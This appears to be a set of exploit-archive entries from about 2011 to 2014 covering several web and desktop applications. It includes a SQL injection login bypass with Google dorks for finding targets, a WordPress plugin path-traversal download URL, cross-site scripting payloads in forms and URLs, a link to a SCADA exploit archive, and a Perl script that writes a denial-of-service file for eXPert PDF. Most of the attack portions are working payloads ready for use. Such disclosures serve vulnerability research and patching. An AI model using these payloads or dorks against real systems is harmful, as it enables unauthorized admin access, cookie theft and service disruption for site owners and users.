# Exploit Title: Free Article Submissions SQL Injection Vulnerability # Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal" inurl:/category.php?id=2 "Arts & Entertainment" # Date: 07/12/2014 # Exploit Author: BarrabravaZ # Vendor Homepage: http://www.articlesetup.com/ # Software Link: [download link if available] # Version: 1.00 # Tested on: Windows xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx «««:»»» Author will be not responsible for any damage. «««:»»» xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x x Issue: x SQL Injection Bypass Login x x Risk level: High x ~ The remote attacker has the possibility to manage the website. x ~ The remote attacker is able to login into website with access level as admin. x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ## ## Proof Of Concept: ## http://127.0.0.1/admin/login.php ## ## Username : ' OR 1=1 # ## Password : barrabravaz ## ## xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Special thanks to: [+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX [+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

###################### # Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download # Exploit Author : Claudio Viviani # Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356 # Software Link : Premium # Dork Google: inurl:ajax-store-locator # index of ajax-store-locator # Date : 2014-12-06 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # PoC Exploit: http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile] "download_file" variable is not sanitized. ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################

source: https://www.securityfocus.com/bid/47008/info Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue. An attacker can exploit these issues to execute arbitrary code and gain access to sensitive information. Other attacks may also be possible. Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35495.zip

source: https://www.securityfocus.com/bid/47014/info MC Content Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. MC Content Manager 10.1.1 is vulnerable; other versions may also be affected. <form name="hack" action="http://www.example.com/?module=users" method="post"> <input type="hidden" name="module" value="users"> <input type="hidden" name="action" value="remind"> <input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'> </form> <form name="hack" action="http://www.example.com/?module=users" method="post"> <input type="hidden" name="module" value="users"> <input type="hidden" name="action" value="register"> <input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'> </form> <form name="hack" action="http://www.example.com/?module=users" method="post"> <input type="hidden" name="module" value="users"> <input type="hidden" name="action" value="register"> <input type="hidden" name="user_hide" value='"><script>alert(document.cookie)</script>'> </form>

source: https://www.securityfocus.com/bid/47015/info GrapeCity Data Dynamics Reports is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Data Dynamics Reports 1.6.2084.14 is vulnerable; other versions may also be affected. http://www.example.com/CoreHandler.ashx?dd:script=CoreViewerInit.js&reportName=<script>alert(&#039;XSS1!&#039;)</script>&uniqueId=<script>alert(&#039;XSS2!&#039;)</script># http://www.example.com/CoreHandler.ashx?dd:script=CoreController.js&uniqueId=<script>alert(&#039;XSS1!&#039;)</script>&traceLevel=<script>alert(&#039;XSS2!&#039;)</script>#

source: https://www.securityfocus.com/bid/47017/info Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Ripe Website Manager 1.1 is vulnerable; other versions may also be affected. Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.

source: https://www.securityfocus.com/bid/47027/info netjukebox is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. netjukebox 5.25 is vulnerable; other versions may also be affected. http://www.example.com/netjukebox/message.php?skin=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E

source: https://www.securityfocus.com/bid/47040/info eXPert PDF is prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause the application to crash, denying service to legitimate users. eXPert PDF 7.0.880.0 is vulnerable; other versions may also be affected. #!/usr/bin/perl ### # Title : eXPert PDF Batch Creator v7 Denial of Service Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Blocked 'vsbatch2pdf.exe' When Generate # Tested on : Windows XP SP3 Fran�ais # Target : eXPert PDF Editor v7.0.880.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : Upload The HTML file in eXPert PDF Batch Creator (vsbatch2pdf.exe) And Start The Generate #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print "\n\n"; print " |=============================================|\n"; print " |= [!] Name : eXPert PDF Batch Creator v7 =|\n"; print " |= [!] Exploit : Denial of Service Exploit =|\n"; print " |= [!] Author : KedAns-Dz =|\n"; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; print " |=============================================|\n"; sleep(2); print "\n"; my $junk = "http://"."\x41" x 17425; open(file , ">", "Kedans.html"); print file $junk; print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; close(file); #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================